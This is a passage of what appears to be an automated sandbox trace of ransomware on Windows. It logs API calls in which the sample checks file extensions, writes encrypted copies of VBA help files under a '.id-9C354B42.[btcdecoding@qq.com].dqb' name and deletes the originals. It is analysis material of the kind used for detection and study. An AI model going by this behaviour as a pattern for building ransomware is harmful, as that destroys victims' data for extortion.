lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.327] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.327] SetEndOfFile (hFile=0x1f8) returned 1 [0046.328] CloseHandle (hObject=0x1f8) returned 1 [0046.328] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.328] SetEndOfFile (hFile=0x228) returned 1 [0046.329] CloseHandle (hObject=0x228) returned 1 [0046.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.329] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 1 [0046.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.329] lstrlenW (lpString=".doc") returned 4 [0046.329] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.329] lstrlenW (lpString=".docx") returned 5 [0046.329] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1 [0046.329] lstrlenW (lpString=".pdf") returned 4 [0046.329] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString=".xls") returned 4 [0046.330] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString=".xlsx") returned 5 [0046.330] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1 [0046.330] lstrlenW (lpString=".ppt") returned 4 [0046.330] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.330] lstrlenW (lpString=".zip") returned 4 [0046.330] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString=".rar") returned 4 [0046.330] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString=".bz2") returned 4 [0046.330] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.330] lstrlenW (lpString=".7z") returned 3 [0046.330] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.330] lstrlenW (lpString=".dbf") returned 4 [0046.330] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.330] lstrlenW (lpString=".1cd") returned 4 [0046.330] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.330] lstrlenW (lpString=".jpg") returned 4 [0046.330] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.330] lstrlenW (lpString=".doc") returned 4 [0046.330] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString=".docx") returned 5 [0046.330] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1 [0046.330] lstrlenW (lpString=".pdf") returned 4 [0046.330] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString=".xls") returned 4 [0046.330] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.330] lstrlenW (lpString=".xlsx") returned 5 [0046.330] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1 [0046.331] lstrlenW (lpString=".ppt") returned 4 [0046.331] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.331] lstrlenW (lpString=".zip") returned 4 [0046.331] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.331] lstrlenW (lpString=".rar") returned 4 [0046.331] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.331] lstrlenW (lpString=".bz2") returned 4 [0046.331] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.331] lstrlenW (lpString=".7z") returned 3 [0046.331] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.331] lstrlenW (lpString=".dbf") returned 4 [0046.331] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.331] lstrlenW (lpString=".1cd") returned 4 [0046.331] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0046.331] lstrlenW (lpString=".jpg") returned 4 [0046.331] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.331] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0046.331] lstrlenW (lpString="VBHW6.CHM") returned 9 [0046.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.331] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=58026) returned 1 [0046.331] CloseHandle (hObject=0x228) returned 1 [0046.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 0x20 [0046.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.332] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.332] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.332] GetLastError () returned 0x0 [0046.332] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xe2aa, lpOverlapped=0x0) returned 1 [0046.512] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe2b0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe2b0, lpOverlapped=0x0) returned 1 [0046.514] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.514] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0046.514] SetEndOfFile (hFile=0x1f8) returned 1 [0046.514] CloseHandle (hObject=0x1f8) returned 1 [0046.514] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.514] SetEndOfFile (hFile=0x228) returned 1 [0046.515] CloseHandle (hObject=0x228) returned 1 [0046.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.515] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 1 [0046.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.516] lstrlenW (lpString=".doc") returned 4 [0046.516] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString=".docx") returned 5 [0046.516] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.516] lstrlenW (lpString=".pdf") returned 4 [0046.516] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString=".xls") returned 4 [0046.516] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString=".xlsx") returned 5 [0046.516] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.516] lstrlenW (lpString=".ppt") returned 4 [0046.516] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.516] lstrlenW (lpString=".zip") returned 4 [0046.516] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString=".rar") returned 4 [0046.516] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString=".bz2") returned 4 [0046.516] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.516] lstrlenW (lpString=".7z") returned 3 [0046.516] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.516] lstrlenW (lpString=".dbf") returned 4 [0046.516] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.516] lstrlenW (lpString=".1cd") returned 4 [0046.516] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.516] lstrlenW (lpString=".jpg") returned 4 [0046.516] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.517] lstrlenW (lpString=".doc") returned 4 [0046.517] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.517] lstrlenW (lpString=".docx") returned 5 [0046.517] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.517] lstrlenW (lpString=".pdf") returned 4 [0046.517] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.517] lstrlenW (lpString=".xls") returned 4 [0046.517] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.517] lstrlenW (lpString=".xlsx") returned 5 [0046.517] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.517] lstrlenW (lpString=".ppt") returned 4 [0046.517] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.517] lstrlenW (lpString=".zip") returned 4 [0046.517] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.517] lstrlenW (lpString=".rar") returned 4 [0046.517] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.517] lstrlenW (lpString=".bz2") returned 4 [0046.517] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.517] lstrlenW (lpString=".7z") returned 3 [0046.517] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.517] lstrlenW (lpString=".dbf") returned 4 [0046.517] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.517] lstrlenW (lpString=".1cd") returned 4 [0046.517] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0046.517] lstrlenW (lpString=".jpg") returned 4 [0046.517] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.517] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0046.518] lstrlenW (lpString="VBOB6.CHM") returned 9 [0046.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.518] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=123956) returned 1 [0046.518] CloseHandle (hObject=0x228) returned 1 [0046.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 0x20 [0046.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.518] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.518] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.518] GetLastError () returned 0x0 [0046.518] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x1e434, lpOverlapped=0x0) returned 1 [0046.522] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1e440, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1e440, lpOverlapped=0x0) returned 1 [0046.525] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.525] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0046.525] SetEndOfFile (hFile=0x1f8) returned 1 [0046.525] CloseHandle (hObject=0x1f8) returned 1 [0046.526] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.526] SetEndOfFile (hFile=0x228) returned 1 [0046.527] CloseHandle (hObject=0x228) returned 1 [0046.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.527] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 1 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.528] lstrlenW (lpString=".doc") returned 4 [0046.528] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString=".docx") returned 5 [0046.528] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.528] lstrlenW (lpString=".pdf") returned 4 [0046.528] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString=".xls") returned 4 [0046.528] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString=".xlsx") returned 5 [0046.528] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.528] lstrlenW (lpString=".ppt") returned 4 [0046.528] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.528] lstrlenW (lpString=".zip") returned 4 [0046.528] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString=".rar") returned 4 [0046.528] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString=".bz2") returned 4 [0046.528] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.528] lstrlenW (lpString=".7z") returned 3 [0046.528] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.528] lstrlenW (lpString=".dbf") returned 4 [0046.528] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.528] lstrlenW (lpString=".1cd") returned 4 [0046.528] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.528] lstrlenW (lpString=".jpg") returned 4 [0046.528] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.528] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.529] lstrlenW (lpString=".doc") returned 4 [0046.529] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0046.529] lstrlenW (lpString=".docx") returned 5 [0046.529] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0046.529] lstrlenW (lpString=".pdf") returned 4 [0046.529] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0046.529] lstrlenW (lpString=".xls") returned 4 [0046.529] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0046.529] lstrlenW (lpString=".xlsx") returned 5 [0046.529] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0046.529] lstrlenW (lpString=".ppt") returned 4 [0046.529] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0046.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.529] lstrlenW (lpString=".zip") returned 4 [0046.529] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0046.529] lstrlenW (lpString=".rar") returned 4 [0046.529] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0046.529] lstrlenW (lpString=".bz2") returned 4 [0046.529] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0046.529] lstrlenW (lpString=".7z") returned 3 [0046.529] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0046.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.529] lstrlenW (lpString=".dbf") returned 4 [0046.529] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0046.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.529] lstrlenW (lpString=".1cd") returned 4 [0046.529] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0046.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0046.529] lstrlenW (lpString=".jpg") returned 4 [0046.529] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0046.529] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0046.529] lstrlenW (lpString="VBUI6.CHM") returned 9 [0046.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.531] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=416918) returned 1 [0046.531] CloseHandle (hObject=0x228) returned 1 [0046.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 0x20 [0046.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.531] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.531] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.534] GetLastError () returned 0x0 [0046.534] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x65c96, lpOverlapped=0x0) returned 1 [0046.556] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x65ca0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x65ca0, lpOverlapped=0x0) returned 1 